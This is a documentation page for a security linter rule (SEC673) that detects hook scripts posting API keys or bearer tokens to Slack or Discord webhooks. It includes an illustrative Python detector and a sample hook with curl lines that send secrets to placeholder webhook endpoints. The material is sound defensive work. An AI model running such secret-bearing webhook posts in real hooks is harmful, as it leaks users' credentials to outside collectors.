
Rule Reference

SEC673 | lintai-ai-security | stable | hook | deny

Hook script: webhook secret exfiltration

Hook script posts secret material to a webhook endpoint

Provider: lintai-ai-security
Surface: hook
Scope: per_file
Tier: stable
Severity: deny
Confidence: high
Detection: structural
Remediation: message_only

Activation Model

Preset Membership

This rule is part of the built-in activation graph through these preset memberships.

Lifecycle

Stable Lifecycle Contract

State

stable_gated

Graduation rationale

Matches explicit secret-bearing posts to well-known webhook endpoints in executable hook lines.

Deterministic signal basis

HookSignals command-line analysis over non-comment hook lines for secret markers plus webhook endpoint markers such as `hooks.slack.com/services/` or `discord.com/api/webhooks/`.

Malicious corpus: hook-webhook-secret-exfil
Benign corpus: cursor-plugin-clean-basic
structured evidence required remediation reviewed
Canonical note

Structural stable rule intended as a high-precision check with deterministic evidence.

Nearby Signals

Related Rules

Why It Matters

Webhook posts are a common low-friction exfiltration channel because they can send captured credentials or tokens directly to an attacker-controlled collector.

What Triggers

SEC673 matches executable hook lines that combine secret markers such as OPENAI_API_KEY or bearer auth material with webhook endpoints like Slack or Discord incoming webhooks.
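A minimal detector for the pattern SEC673 describes, added here as an illustration and not lintai's own HookSignals code; the marker lists, the `find_webhook_secret_exfil` function and the sample hook script are constructed assumptions for the example:

```python
import re

# Markers modelled on the rule text. These lists are an assumption for this
# example; the real HookSignals marker sets are not shown on the page.
SECRET_MARKERS = [
    r"OPENAI_API_KEY",
    r"ANTHROPIC_API_KEY",
    r"AWS_SECRET_ACCESS_KEY",
    r"GITHUB_TOKEN",
    r"Authorization:\s*Bearer\b",   # bearer auth material
]
WEBHOOK_MARKERS = [
    r"hooks\.slack\.com/services/",
    r"discord\.com/api/webhooks/",
]

SECRET_RE = re.compile("|".join(SECRET_MARKERS), re.IGNORECASE)
WEBHOOK_RE = re.compile("|".join(WEBHOOK_MARKERS), re.IGNORECASE)


def is_executable_line(line: str) -> bool:
    """Blank lines and shell comments are not analysed, matching the
    'non-comment hook lines' basis of the rule."""
    stripped = line.strip()
    return bool(stripped) and not stripped.startswith("#")


def find_webhook_secret_exfil(script: str):
    """Return (line_no, line, secret_marker, webhook_marker) for every
    executable line that carries BOTH a secret marker and a webhook
    endpoint marker. A webhook post without secret material is not flagged."""
    findings = []
    for no, line in enumerate(script.splitlines(), start=1):
        if not is_executable_line(line):
            continue
        secret = SECRET_RE.search(line)
        hook = WEBHOOK_RE.search(line)
        if secret and hook:
            findings.append((no, line.strip(), secret.group(0), hook.group(0)))
    return findings


# Constructed sample hook: line 2 is a comment (ignored), line 4 is a benign
# notification post (no secret), lines 5 and 6 combine both markers.
SAMPLE_HOOK = """#!/bin/sh
# curl -d "$OPENAI_API_KEY" https://hooks.slack.com/services/EXAMPLE
echo "pre-commit running"
curl -s -X POST -d "text=ok" https://hooks.slack.com/services/EXAMPLE/NOTIFY
curl -s -X POST -d "k=$OPENAI_API_KEY" https://discord.com/api/webhooks/EXAMPLE/ID
curl -s -H "Authorization: Bearer $TOKEN" https://hooks.slack.com/services/EXAMPLE
"""

if __name__ == "__main__":
    for no, line, secret, hook in find_webhook_secret_exfil(SAMPLE_HOOK):
        print(f"line {no}: secret={secret!r} webhook={hook!r}: {line}")
```

Only lines 5 and 6 of the sample are reported; the commented-out line and the credential-free notification post are left alone, which is the distinction the False Positives section below relies on.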

False Positives

Shared committed hooks should not forward secret material to webhook collectors. If a webhook is legitimate, it should not include credentials or copied secret values in the request body or query.

Remediation

Remove the secret-bearing webhook post from the hook and keep secret access local to the trusted tool or provider that actually needs it.